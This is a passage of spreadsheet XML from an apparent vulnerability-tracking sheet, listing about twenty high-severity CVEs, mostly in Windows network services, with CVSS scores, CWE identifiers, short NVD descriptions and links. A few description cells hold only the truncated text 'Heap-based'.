      <c r="P647" s="5" t="inlineStr"/>
      <c r="Q647" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69524</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69530</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr"/>
      <c r="Q648" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69530</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69546</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr"/>
      <c r="Q649" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69546</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69620</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr"/>
      <c r="Q650" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69620</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69680</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr"/>
      <c r="Q651" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Windows DNS allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69680</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69732</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr"/>
      <c r="Q652" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69732</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69782</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr"/>
      <c r="Q653" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69782</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69786</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr"/>
      <c r="Q654" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69786</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K655" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr"/>
      <c r="Q655" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr"/>
      <c r="Q656" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr"/>
      <c r="Q657" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr"/>
      <c r="Q658" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R658" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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59" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr"/>
      <c r="Q659" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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60" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr"/>
      <c r="Q660" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72001</t>
        </is>
      </c>
      <c r="D661" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr"/>
      <c r="Q661" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>Pangolin before 1.22.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any protected resource by supplying an attacker-controlled URL parameter to the share-link authentication endpoint that omits the expected resource identifier from the token verification call. Attackers holding a single valid share link for any resource can authenticate against arbitrary resources across different organizations, bypassing all configured authentication methods including SSO, resource passwords, PIN codes, email allowlists, and header authentication.</t>
        </is>
      </c>
      <c r="S661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72001</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72936</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr"/>
      <c r="Q662" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R662" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72981</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr"/>
      <c r="Q663" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>Use after free in IP Helper allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72981</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr"/>
      <c r="Q664" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73313</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr"/>
      <c r="Q665" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R665" s="5" t="inlineStr">
        <is>
